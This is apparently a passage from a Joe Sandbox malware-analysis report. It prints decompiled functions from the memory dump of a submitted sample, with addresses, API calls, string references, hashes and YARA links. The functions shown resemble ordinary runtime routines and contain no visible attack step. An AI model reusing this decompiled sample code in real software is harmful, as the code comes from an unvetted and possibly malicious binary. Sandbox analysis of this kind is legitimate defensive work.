										__eax = E03269264( *(__ebp - 0x22) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E032692B0(__ebp) = E03269314(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E03269264( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E032692B0(__ebp) = E03269314(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E03269264( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E032692B0(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x329d830; // 0x92ea6b8
											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x329d82c; // 0x92f8ef0
											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E032692B0(__ebp) = E03269314(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E03269264( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E032692B0(__ebp) =  *(__ebp + 8);
										__eax =  *0x329d818; // 0x92f8ed8
										__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E03269314(__ebp);
										__eflags =  *(__ebp - 0x16);
										if( *(__ebp - 0x16) != 0) {
											L93:
											 *(__ebp + 8) = 0x3269d9c;
											__edx = 1;
											E03269204(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x329d830; // 0x92ea6b8
											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x329d815;
										__eflags = __eax - 0x329d815;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ebp - 0x75000000) & __dl;
									case 0xe:
										L97:
										__eflags =  *0x329d820;
										__eflags = __eax - 0x329d820;
										_t128 = __esi + __esi * 2 - 0x75;
										 *_t128 =  *(__esi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t128;
									case 0xf:
										L100:
										__esi =  *__edi;
										while(1) {
											L104:
											__eax =  *__edi;
											__eflags =  *( *__edi);
											if( *( *__edi) == 0) {
												break;
											}
											L105:
											 *__edi =  *( *__edi) & 0x000000ff;
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__eflags != 0) {
												L101:
												 *__edi =  *( *__edi) & 0x000000ff;
												__eax = __al & 0x000000ff;
												asm("bt [0x3289808], eax");
												if(__eflags >= 0) {
													 *__edi =  *__edi + 1;
													__eflags =  *__edi;
												} else {
													__eax =  *__edi;
													 *__edi = E0326BAC0( *__edi);
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *__edi;
										__edx =  *__edi - __esi;
										__esi = E03269204(__edx,  *(__ebp + 8));
										__eax =  *__edi;
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *__edi =  *__edi + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t220 - 0x4d;
								if(_t220 == 0x4d) {
									__eflags =  *(_t264 - 0x1e) - 0x48;
									if( *(_t264 - 0x1e) == 0x48) {
										_t220 = 0x4e;
									}
								}
								L9:
								 *(_t264 - 0x1e) = _t220;
								goto L10;
							}
						} else {
							E03269204(E0326BAA0( *_t261),  *((intOrPtr*)(_t264 + 8)));
							 *_t261 = E0326BAC0( *_t261);
							 *(_t264 - 0x1e) = 0x20;
							continue;
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) - 1;
					_pop(_t258);
					 *[fs:eax] = _t258;
					_push(E03269D73);
					return E032644C4(_t264 - 0x2c, 2);
				}
			}

0x03269ad0
0x03269ad0
0x03269ad0
0x03269ad0
0x03269ad1
0x03269ad9
0x03269aeb
0x03269aed
0x03269b22
0x03269b27
0x03269b29
0x03269b5e
0x03269b63
0x03269b65
0x03269ba6
0x03269bab
0x03269bad
0x03269bec
0x03269bf1
0x03269bf3
0x03269c32
0x03269bf5
0x03269bf6
0x03269c18
0x03269c1e
0x03269c1e
0x03269baf
0x03269bb0
0x03269bd2
0x03269bd8
0x03269bd8
0x03269b67
0x03269b67
0x03269b6c
0x03269b83
0x03269b88
0x03269b6e
0x03269b72
0x03269b77
0x03269b7c
0x03269b8e
0x03269b91
0x03269b91
0x03269b2b
0x03269b2b
0x03269b30
0x03269b32
0x03269b32
0x03269b40
0x03269b46
0x03269b49
0x03269b49
0x03269aef
0x03269aef
0x03269af4
0x03269af6
0x03269af6
0x03269af6
0x03269af9
0x03269afd
0x03269b02
0x03269b04
0x03269b0a
0x03269b0d
0x03269b0d
0x00000000
0x03269d3d
0x03269649
0x03269653
0x0326965a
0x0326968a
0x0326968c
0x03269694
0x03269696
0x03269698
0x03269698
0x03269698
0x0326969b
0x0326969f
0x032696a1
0x032696b3
0x032696b6
0x032696b9
0x032696bc
0x03269d2b
0x03269d37
0x00000000
0x03269d3c
0x032696c2
0x032696c9
0x00000000
0x00000000
0x00000000
0x03269749
0x0326974a
0x03269751
0x03269757
0x0326975b
0x0326978d
0x0326975d
0x03269775
0x0326977a
0x00000000
0x00000000
0x03269798
0x032697a0
0x032697a6
0x032697ab
0x032697b1
0x032697b7
0x032697ba
0x00000000
0x00000000
0x032697c5
0x032697cd
0x032697d3
0x032697d8
0x032697de
0x032697e4
0x032697e7
0x00000000
0x00000000
0x032697f2
0x032697fa
0x03269803
0x03269804
0x03269804
0x03269807
0x0326980d
0x03269811
0x03269815
0x03269818
0x03269809
0x03269809
0x03269827
0x0326982b
0x03269832
0x0326980b
0x03269841
0x03269845
0x0326984c
0x03269851
0x03269809
0x00000000
0x00000000
0x03269857
0x0326985e
0x03269861
0x03269862
0x03269862
0x03269865
0x03269878
0x0326987c
0x03269880
0x03269883
0x03269867
0x03269867
0x032698a0
0x032698a3
0x032698aa
0x03269869
0x03269869
0x03269869
0x0326986a
0x032698c7
0x032698ca
0x032698d1
0x0326986c
0x0326986c
0x0326986c
0x0326986d
0x032698dc
0x032698e0
0x032698e5
0x0326986f
0x032698f0
0x032698f4
0x032698f9
0x032698fe
0x0326986d
0x0326986a
0x03269867
0x00000000
0x00000000
0x03269904
0x0326990c
0x03269912
0x03269916
0x032699b3
0x032699b3
0x032699b3
0x032699b6
0x00000000
0x00000000
0x0326991d
0x03269920
0x03269923
0x0326992a
0x03269937
0x03269937
0x0326993a
0x0326993d
0x03269952
0x03269952
0x03269952
0x03269955
0x0326995e
0x0326995e
0x03269962
0x032699b2
0x032699b2
0x032699b2
0x00000000
0x032699b2
0x03269964
0x03269964
0x03269969
0x0326996e
0x03269970
0x03269975
0x03269977
0x032699a3
0x032699a3
0x00000000
0x032699a3
0x03269979
0x03269979
0x0326997e
0x03269983
0x03269985
0x0326998a
0x0326998c
0x00000000
0x00000000
0x0326998e
0x0326998e
0x03269993
0x03269998
0x0326999a
0x0326999f
0x032699a1
0x00000000
0x00000000
0x00000000
0x032699a1
0x03269957
0x03269957
0x03269957
0x0326995a
0x00000000
0x00000000
0x0326995c
0x00000000
0x0326995c
0x0326993f
0x0326993f
0x00000000
0x00000000
0x03269941
0x03269941
0x03269941
0x03269944
0x032699a9
0x032699a9
0x032699ad
0x032699ad
0x032699af
0x00000000
0x032699af
0x03269946
0x03269946
0x03269946
0x03269949
0x00000000
0x00000000
0x0326994b
0x0326994b
0x0326994b
0x0326994e
0x00000000
0x00000000
0x03269950
0x00000000
0x0326992c
0x0326992c
0x03269933
0x00000000
0x03269933
0x0326992a
0x032699bc
0x032699bc
0x032699c0
0x032699c4
0x032699c8
0x032699ca
0x032699cf
0x032699d9
0x032699de
0x032699e0
0x032699e0
0x032699e0
0x032699e0
0x032699d1
0x032699d1
0x032699d1
0x032699cf
0x032699e5
0x032699e9
0x032699eb
0x032699eb
0x032699f2
0x032699f6
0x032699fa
0x032699fd
0x00000000
0x00000000
0x03269a08
0x03269a10
0x03269a16
0x03269a1a
0x03269a1c
0x03269a1c
0x03269a23
0x03269a27
0x03269a2b
0x03269a2e
0x00000000
0x00000000
0x03269a39
0x03269a41
0x03269a47
0x03269a4b
0x03269a4d
0x03269a4d
0x03269a54
0x03269a58
0x03269a5c
0x03269a5f
0x00000000
0x00000000
0x03269a6a
0x03269a6b
0x03269a71
0x03269a75
0x03269a8b
0x03269a8f
0x03269a94
0x03269a77
0x03269a77
0x03269a7b
0x03269a80
0x03269a85
0x00000000
0x00000000
0x03269a9f
0x03269aa7
0x03269aad
0x03269ab1
0x03269ab3
0x03269ab3
0x03269aba
0x03269abe
0x03269ac2
0x03269ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x03269c3d
0x03269c44
0x03269c48
0x03269c4d
0x03269c54
0x03269c5a
0x03269c5f
0x03269c73
0x03269c77
0x03269c7c
0x03269c87
0x03269c8b
0x03269c90
0x00000000
0x03269c95
0x03269c61
0x03269c61
0x03269c66
0x00000000
0x00000000
0x03269c68
0x03269c68
0x03269c6d
0x00000000
0x00000000
0x00000000
0x00000000
0x03269c9b
0x03269c9b
0x03269c9c
0x03269ca1
0x03269ca3
0x00000000
0x03269cbe
0x03269cbe
0x03269cbf
0x03269cc4
0x03269cc4
0x03269cc4
0x00000000
0x03269cdd
0x03269cdd
0x03269cff
0x03269cff
0x03269cff
0x03269d01
0x03269d04
0x00000000
0x00000000
0x03269d06
0x03269d08
0x03269d0b
0x03269d0e
0x03269ce1
0x03269ce3
0x03269ce6
0x03269ce9
0x03269cf0
0x03269cfd
0x03269cfd
0x03269cf2
0x03269cf2
0x03269cf9
0x03269cf9
0x00000000
0x03269cf0
0x00000000
0x03269d0e
0x03269d10
0x03269d10
0x03269d14
0x03269d16
0x03269d1a
0x03269d20
0x03269d22
0x03269d25
0x03269d27
0x03269d27
0x00000000
0x00000000
0x032696a3
0x032696a3
0x032696a6
0x032696a8
0x032696ac
0x032696ae
0x032696ae
0x032696ac
0x032696b0
0x032696b0
0x00000000
0x032696b0
0x0326965c
0x0326966b
0x03269678
0x0326967a
0x00000000
0x0326967a
0x0326965a
0x03269d4b
0x03269d53
0x03269d56
0x03269d59
0x03269d6b
0x03269d6b

Strings

AAA, xrefs: 03269BE0
AM/PM, xrefs: 03269ADA
AMPM, xrefs: 03269B52
A/P, xrefs: 03269B16
AAAA, xrefs: 03269B9A

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: A/P$AAA$AAAA$AM/PM$AMPM
API String ID: 0-3831542625
Opcode ID: c2f8d2f62c549c248dc81065a10dd44ffc86c4f43021e14631183279755377ef
Instruction ID: 81602b89b5465e02c94536d93f0188c2f0374caecceb31113b02c3e2ac24e573
Opcode Fuzzy Hash: c2f8d2f62c549c248dc81065a10dd44ffc86c4f43021e14631183279755377ef
Instruction Fuzzy Hash: 79418C796342059FEB41FB18D804BAE73E9AF09350F508066E5098F292DFB9DDC28B94

Uniqueness

Uniqueness Score: -1.00%

Function 03290E80 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

+, xrefs: 03290E9C
-, xrefs: 03290EA6
0, xrefs: 03290ECC
9, xrefs: 03290ED1
-, xrefs: 03290EA1

Memory Dump Source

Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$-$0$9
API String ID: 0-893461730
Opcode ID: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
Instruction ID: 948409d249735f1f91d1d0af05ebe55d54606aafa292790f73dea31d0e9a9b95
Opcode Fuzzy Hash: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
Instruction Fuzzy Hash: B0F0AF167B622E5EFF3AC42ECC403B6B78F9B822A1F1C846798C1C6241D5A9898182D0

Uniqueness

Uniqueness Score: -1.00%

Function 0326E1CC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0326E1CC(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0326E014(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0326D234();
							E0326E014(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0326D23C();
							E0326E014(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0326E170(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0326E140(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0326D244();
						E0326E014(_v780);
						E0326E3C4(_v792);
					}
				}
				L15:
				_push(_v776);
				L0326CDCC();
				return E0326E014(_v776);
			}

0x0326e1d8
0x0326e1e8
0x0326e1ef
0x0326e1ef
0x0326e1fa
0x0326e208
0x0326e217
0x0326e235
0x0326e219
0x0326e224
0x0326e224
0x0326e244
0x0326e250
0x0326e253
0x0326e255
0x0326e256
0x0326e258
0x0326e25e
0x0326e260
0x0326e26f
0x0326e270
0x0326e27a
0x0326e27b
0x0326e280
0x0326e28b
0x0326e28c
0x0326e296
0x0326e297
0x0326e29c
0x0326e2b7
0x0326e2b9
0x0326e2ba
0x0326e2bd
0x0326e2bd
0x0326e25e
0x0326e2c6
0x0326e2c9
0x0326e2cb
0x0326e2cc
0x0326e2d2
0x0326e2d8
0x0326e2da
0x0326e2dc
0x0326e2df
0x0326e2e2
0x0326e2e2
0x0326e2e5
0x00000000
0x00000000
0x00000000
0x0326e2e5
0x0326e2e5
0x0326e2ec
0x0326e2f7
0x0326e2ff
0x0326e306
0x0326e30d
0x0326e30e
0x0326e313
0x0326e31e
0x0326e31e
0x0326e32c
0x0326e330
0x0326e336
0x0326e337
0x0326e347

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0326E27B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0326E297
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0326E30E
VariantClear.OLEAUT32(?), ref: 0326E337

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 33e3f589679e819a86a178bb566128554318f0ad29f63d1d88186ed430a24978
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 6D413B79A1072E9FCB61DF58CD90BD9B3BDAF48600F0541D5E649AB211DA70AFC18F60

Uniqueness

Uniqueness Score: -1.00%

Function 0326AD20 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326AD20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x329d7f8; // 0x3260000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0326AD14(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E03268070( &_v273, 0x104, E0326BC10( &_v534, 0x5c) + 1);
				_t74 = 0x326aea0;
				_t86 = 0x326aea0;
				_t83 =  *0x3266a8c; // 0x3266ad8
				if(E03263850(_t87, _t83) != 0) {
					_t74 = E03264964( *((intOrPtr*)(_t87 + 4)));
					_t69 = E03268048(_t74, 0x326aea0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x326aea4;
					}
				}
				_t51 =  *0x329a980; // 0x3266874
				_t16 = _t51 + 4; // 0xffe9
				_t53 =  *0x329d7f8; // 0x3260000
				LoadStringA(E03265874(_t53),  *_t16,  &_v790, 0x100);
				E0326363C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E03268590(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E03268048(_v8, _t86);
			}

0x0326ad20
0x0326ad2c
0x0326ad2f
0x0326ad31
0x0326ad3d
0x0326ad4c
0x0326ad76
0x0326ad7c
0x0326ad88
0x0326ad8d
0x0326ad93
0x0326ad93
0x0326adb1
0x0326adb6
0x0326adbb
0x0326adc2
0x0326adcf
0x0326add9
0x0326addd
0x0326ade4
0x0326aded
0x0326aded
0x0326ade4
0x0326adfe
0x0326ae03
0x0326ae07
0x0326ae12
0x0326ae1f
0x0326ae2a
0x0326ae30
0x0326ae3d
0x0326ae43
0x0326ae4d
0x0326ae53
0x0326ae5a
0x0326ae60
0x0326ae67
0x0326ae6d
0x0326ae89
0x0326ae9c

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
LoadStringA.USER32 ref: 0326AE12

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 2afbc080738fe6b32016206b41b7e055c99294ad2eecdf1e13519c9448dc6602
Instruction ID: a8c28c4d8df65952189f3ad1b13f99902abc808509b534a2eb3e78bf77773bb0
Opcode Fuzzy Hash: 2afbc080738fe6b32016206b41b7e055c99294ad2eecdf1e13519c9448dc6602
Instruction Fuzzy Hash: 81410CB5A503589BDB21EB68DC84BDEB7FCAF08205F0440EAA548EB251D7B49FC48F50

Uniqueness

Uniqueness Score: -1.00%

Function 0326AD1E Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326AD1E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x329d7f8; // 0x3260000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0326AD14(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E03268070( &_v273, 0x104, E0326BC10( &_v534, 0x5c) + 1);
				_t75 = 0x326aea0;
				_t89 = 0x326aea0;
				_t85 =  *0x3266a8c; // 0x3266ad8
				if(E03263850(_t92, _t85) != 0) {
					_t75 = E03264964( *((intOrPtr*)(_t92 + 4)));
					_t69 = E03268048(_t75, 0x326aea0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x326aea4;
					}
				}
				_t51 =  *0x329a980; // 0x3266874
				_t16 = _t51 + 4; // 0xffe9
				_t53 =  *0x329d7f8; // 0x3260000
				LoadStringA(E03265874(_t53),  *_t16,  &_v790, 0x100);
				E0326363C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E03268590(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E03268048(_v8, _t89);
			}

0x0326ad2c
0x0326ad2f
0x0326ad31
0x0326ad3d
0x0326ad4c
0x0326ad76
0x0326ad7c
0x0326ad88
0x0326ad8d
0x0326ad93
0x0326ad93
0x0326adb1
0x0326adb6
0x0326adbb
0x0326adc2
0x0326adcf
0x0326add9
0x0326addd
0x0326ade4
0x0326aded
0x0326aded
0x0326ade4
0x0326adfe
0x0326ae03
0x0326ae07
0x0326ae12
0x0326ae1f
0x0326ae2a
0x0326ae30
0x0326ae3d
0x0326ae43
0x0326ae4d
0x0326ae53
0x0326ae5a
0x0326ae60
0x0326ae67
0x0326ae6d
0x0326ae89
0x0326ae9c

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
LoadStringA.USER32 ref: 0326AE12

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 3219fd657536eec837fdbde02e09f2f3193f14ab3f8177d9543c0b8e96a3e725
Instruction ID: b31467b21076f41837f201d4b3adb936081f53e809c98010b7e54d8b0a72e7af
Opcode Fuzzy Hash: 3219fd657536eec837fdbde02e09f2f3193f14ab3f8177d9543c0b8e96a3e725
Instruction Fuzzy Hash: 09411EB5A503589BDB21EB68DC84BDAB7FCAF08205F0440E9A548EB251D7B49FC48F50

Uniqueness

Uniqueness Score: -1.00%

Function 03261C6C Relevance: 5.3, APIs: 4, Instructions: 330
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03261C6C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
				unsigned int _t184;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				void* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				signed int _t208;

				_t181 = __edi;
				_t166 = __edx;
				_t145 =  *(__eax - 4);
				_t196 = __eax;
				if((_t145 & 0x00000007) != 0) {
					__eflags = _t145 & 0x00000005;
					if((_t145 & 0x00000005) != 0) {
						__eflags = _t145 & 0x00000003;
						if((_t145 & 0x00000003) != 0) {
							__eflags = 0;
							return 0;
						} else {
							_t146 = _t145 - 0x18;
							__eflags = __edx - _t146;
							if(__edx <= _t146) {
								__eflags = __edx - _t146 >> 1;
								if(__edx < _t146 >> 1) {
									_t131 = __edx;
									_t58 = E03261724(__edx);
									__eflags = _t58;
									if(_t58 == 0) {
										goto L61;
									} else {
										__eflags = _t131 - 0x40a2c;
										if(_t131 > 0x40a2c) {
											 *((intOrPtr*)(_t58 - 8)) = _t131;
										}
										E032614A4(_t196, _t131, _t58);
										E03261A8C(_t196, _t181);
										return _t58;
									}
								} else {
									 *((intOrPtr*)(__eax - 8)) = __edx;
									return __eax;
								}
							} else {
								asm("adc eax, 0xffffffff");
								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
								_push(__edx);
								_t58 = E03261724((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
								_pop(_t168);
								__eflags = _t58;
								if(_t58 != 0) {
									__eflags = _t133 - 0x40a2c;
									if(_t133 > 0x40a2c) {
										 *((intOrPtr*)(_t58 - 8)) = _t168;
									}
									E03261474(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
									E03261A8C(_t196, _t181);
									return _t58;
								}
								L61:
								return _t58;
							}
						}
					} else {
						_t153 = _t145 & 0xfffffff0;
						_push(__edi);
						_t182 = _t153 + __eax;
						_t154 = _t153 - 4;
						_t136 = _t145 & 0x0000000f;
